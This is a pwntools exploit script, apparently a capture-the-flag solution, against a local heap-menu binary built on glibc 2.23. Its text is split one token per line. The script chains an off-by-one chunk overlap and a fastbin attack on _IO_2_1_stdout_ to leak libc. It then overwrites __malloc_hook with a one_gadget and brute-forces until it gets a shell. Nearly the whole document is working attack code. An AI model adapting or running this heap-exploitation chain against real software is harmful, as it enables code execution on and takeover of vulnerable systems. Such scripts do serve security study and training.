from
pwn
import
*
from
LibcSearcher
import
*
s
=
lambda
buf: io.send(buf)
sl
=
lambda
buf: io.sendline(buf)
sa
=
lambda
delim, buf: io.sendafter(delim, buf)
sal
=
lambda
delim, buf: io.sendlineafter(delim, buf)
shell
=
lambda
: io.interactive()
r
=
lambda
n
=
None
: io.recv(n)
ra
=
lambda
t
=
tube.forever:io.recvall(t)
ru
=
lambda
delim: io.recvuntil(delim)
rl
=
lambda
: io.recvline()
rls
=
lambda
n
=
2
*
*
20
: io.recvlines(n)
libc_path
=
"/lib/x86_64-linux-gnu/libc-2.23.so"
elf_path
=
"./pwn"
libc
=
ELF(libc_path)
elf
=
ELF(elf_path)
if
sys.argv[
1
]
=
=
'1'
:
context(log_level
=
'debug'
,terminal
=
'/bin/zsh'
, arch
=
'amd64'
, os
=
'linux'
)
elif
sys.argv[
1
]
=
=
'0'
:
context(log_level
=
'info'
,terminal
=
'/bin/zsh'
, arch
=
'amd64'
, os
=
'linux'
)
cho
=
'>>>'
siz
=
'len:'
con
=
'content:'
ind
=
'idx:'
edi
=
''
def
add(index,size,content
=
'
',c='
1
'):
sal(cho,c)
sal(ind,
str
(index))
sal(siz,
str
(size))
sa(con,content)
def
free(index,c
=
'2'
):
sal(cho,c)
sal(ind,
str
(index))
def
get_proc_base(p):
proc_base
=
p.libs()[p._cwd
+
p.argv[
0
].strip(
'.'
)]
info(
hex
(proc_base))
def
get_libc_base(p):
libc_base
=
p.libs()[libc_path]
info(
hex
(libc_base))
def
exp():
global
io
io
=
process(elf_path)
add(
0
,
0xb8
,
'a'
*
0xb0
)
add(
1
,
0x68
,
'b'
*
0x68
)
add(
2
,
0xf8
,
'c'
*
0xc8
)
add(
3
,
0x28
,
'd'
*
0x28
)
free(
0
)
free(
1
)
add(
1
,
0x68
,
'\x00'
*
0x60
+
p64(
0x130
)
+
'\x00'
)
free(
2
)
free(
1
)
add(
0
,
0xb8
,
'a'
*
0xb8
+
'\x71'
)
add(
1
,
0x70
,
'\xdd\x25'
)
free(
0
)
add(
0
,
0xb8
,
'a'
*
0xb8
+
'\x71'
)
add(
4
,
0x68
,
'\xdd'
)
add(
5
,
0x68
,
'a'
*
0x33
+
p64(
0xfbad1800
)
+
p64(
0
)
*
3
+
'\x20'
)
libc_base
=
u64(ru(
'\x7f'
)[
-
6
:].ljust(
8
,
'\x00'
))
-
(
0x7ffff7dd2620
-
0x7ffff7a0d000
)
info(
"libc base:"
+
hex
(libc_base))
malloc_hook
=
libc_base
+
libc.sym[
'__malloc_hook'
]
info(
"mallochook:"
+
hex
(malloc_hook))
sl(
'1'
)
sal(
'idx:'
,
str
(
2
))
sal(
'len:'
,
str
(
0xe8
))
sa(
'content'
,
'ppp'
)
add(
6
,
0xb8
,
'a'
*
0xb0
)
add(
7
,
0x68
,
'b'
*
0x68
)
add(
8
,
0xf8
,
'c'
*
0xc8
)
add(
9
,
0x28
,
'd'
*
0x28
)
free(
6
)
free(
7
)
add(
7
,
0x68
,
'\x00'
*
0x60
+
p64(
0x130
)
+
'\x00'
)
free(
7
)
free(
8
)
add(
6
,
0xb8
,
'a'
*
0xb8
+
'\x71'
)
add(
7
,
0x70
,p64(malloc_hook
-
0x23
))
free(
6
)
add(
6
,
0xb8
,
'a'
*
0xb8
+
'\x71'
)
add(
10
,
0x68
,
'\xed'
)
ogg
=
libc_base
+
0xf1207
add(
11
,
0x68
,
'\x00'
*
0x13
+
p64(ogg))
sal(
'>>>'
,
'1'
)
sal(
"idx:"
,
'0'
)
sal(
'len:'
,
'100'
)
while
(
1
):
try
:
exp()
io.interactive()
break
except
Exception:
info(
"try again"
)
io.close()